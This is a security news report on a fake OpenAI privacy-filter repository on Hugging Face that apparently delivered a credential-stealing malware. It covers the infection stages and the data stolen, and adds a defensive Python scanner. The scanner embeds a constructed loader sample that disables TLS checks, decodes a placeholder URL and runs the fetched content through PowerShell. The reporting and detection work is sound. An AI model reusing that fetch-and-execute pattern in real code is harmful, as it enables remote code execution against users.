Trending Hugging Face Repo Deploys Sefirah Infostealer
A malicious repository impersonating an OpenAI tool manipulated Hugging Face trending algorithms to distribute a Rust-based infostealer to developers.
Between May 7 and May 9, 2026, attackers successfully manipulated Hugging Face rankings to distribute malware via a typosquatted repository named Open-OSS/privacy-filter. The package was designed to mimic a legitimate OpenAI tool used for redacting Personally Identifiable Information. By artificially inflating interaction metrics, the repository reached the number one spot on the platform’s trending list, accumulating approximately 244,000 downloads before its removal following reports from HiddenLayer and community members.
Infection Chain and Evasion Strategy
The repository mirrored the authentic OpenAI model card verbatim but shipped with a weaponized script named loader.py. This script contained decoy code to bypass cursory inspections while initiating the infection sequence in the background.
| Stage | Component | Function |
|---|---|---|
| 1 | loader.py | Disables SSL verification and decodes a base64-encoded URL. |
| 2 | JSON Payload | Executes hidden PowerShell commands. |
| 3 | start.bat | Initiates privilege escalation on the host machine. |
| 4 | Persistence | Adds exclusion to Microsoft Defender, creates Windows Task Scheduler entry. |
| 5 | Payload | Deploys Rust-based sefirah infostealer. |
The script executes before any legitimate model loading occurs. By disabling SSL verification, it ensures the outbound connection to the payload server bypasses strict certificate checks that might otherwise flag the initial network request. The final payload, identified as sefirah, is linked to the WinOS 4.0 implant. The malware implements environment checks to detect virtual machines, sandboxes, and debuggers, allowing it to halt execution during automated security analysis.
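A defender can triage helper scripts pulled from a hub for the combination described above before running anything. The following is an added example, not code from the report or from the repository it describes; it assumes the script is Python, uses only the standard library, and the encoded URL in the constructed sample is a placeholder:

```python
"""Static triage for helper scripts pulled from a model hub (added example, not code
from the report or the repository it describes). Flags the behaviours the article
attributes to loader.py: TLS verification disabled, a base64 literal that decodes
to a URL, and a process launch that names PowerShell."""
import ast
import base64
import re
from typing import List, Optional

SSL_DISABLERS = {"_create_unverified_context", "CERT_NONE"}  # stdlib ssl attributes
PROCESS_LAUNCHERS = {("subprocess", "run"), ("subprocess", "Popen"), ("subprocess", "call"),
                     ("subprocess", "check_output"), ("os", "system"), ("os", "popen")}
POWERSHELL_RE = re.compile(r"\b(powershell|pwsh)\b", re.IGNORECASE)

def decoded_url(literal: str) -> Optional[str]:
    """Return the URL if `literal` is strict base64 that decodes to http(s)://, else None."""
    try:
        text = base64.b64decode(literal, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):  # binascii.Error subclasses ValueError
        return None
    return text if text.startswith(("http://", "https://")) else None

def triage(source: str) -> List[str]:
    """Walk the AST of one Python file and return its findings (empty list = nothing flagged)."""
    findings: List[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute) and node.attr in SSL_DISABLERS:
            findings.append(f"ssl-verification-disabled:{node.attr}")
        elif (isinstance(node, ast.keyword) and node.arg == "verify"
              and isinstance(node.value, ast.Constant) and node.value.value is False):
            findings.append("ssl-verification-disabled:verify=False")  # requests/httpx style
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            url = decoded_url(node.value)
            if url:
                findings.append(f"base64-url:{url}")
            if POWERSHELL_RE.search(node.value):
                findings.append("powershell-string")
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
              and isinstance(node.func.value, ast.Name)
              and (node.func.value.id, node.func.attr) in PROCESS_LAUNCHERS):
            findings.append(f"process-launch:{node.func.value.id}.{node.func.attr}")
    return findings

# Constructed sample modelled on the described chain; the encoded URL is a placeholder.
SAMPLE = '''
import ssl, base64, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvcGF5bG9hZC5qc29u").decode()
subprocess.run(["powershell", "-c", urllib.request.urlopen(url).read().decode()])
'''
```

Run `triage(open(path).read())` over every `.py` file in a pulled repository; any file that combines the SSL, base64-URL and process-launch findings deserves a manual read before it is executed.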
Exfiltration Targets
Once established, the infostealer harvests sensitive credentials and session data, transmitting them to a command-and-control server at recargapopular[.]com. The payload explicitly targets developer environments and operational infrastructure.
The malware extracts cookies, saved passwords, encryption keys, and session tokens from Chromium and Gecko-based browsers. It searches local file systems for cryptocurrency wallet extensions, seed phrases, FileZilla credentials, and SSH, FTP, and VPN configuration files. It also parses local databases to extract Discord tokens and master keys. The comprehensive credential harvesting indicates the attackers seek to pivot into corporate networks. Development machines often hold high-privilege access tokens, making them prime targets for initial access brokers.
Supply Chain Vulnerabilities
The incident highlights systemic risks in open-source AI model distribution. To achieve the top trending position, attackers deployed a bot network that generated 667 fake “likes” and synthetic interactions. While the download count includes bot activity designed to trick the platform’s ranking algorithm, the repository’s prominent placement exposed genuine developers to the payload.
Security researchers note this campaign shares infrastructure with recent npm ecosystem compromises and aligns with a broader pattern of AI supply chain poisoning. On May 8, a separate incident exposed 341 malicious AI skills on ClawHub, demonstrating how attackers are actively shifting their focus toward machine learning developers. If you regularly pull unvetted weights or execution scripts, the risk profile now mirrors a traditional supply chain attack.
If you download models or utility scripts from community hubs, you must assume compromise and isolate the execution environment completely. Run all third-party code in strict sandboxes without access to your host machine’s SSH keys, environment variables, or local network configurations.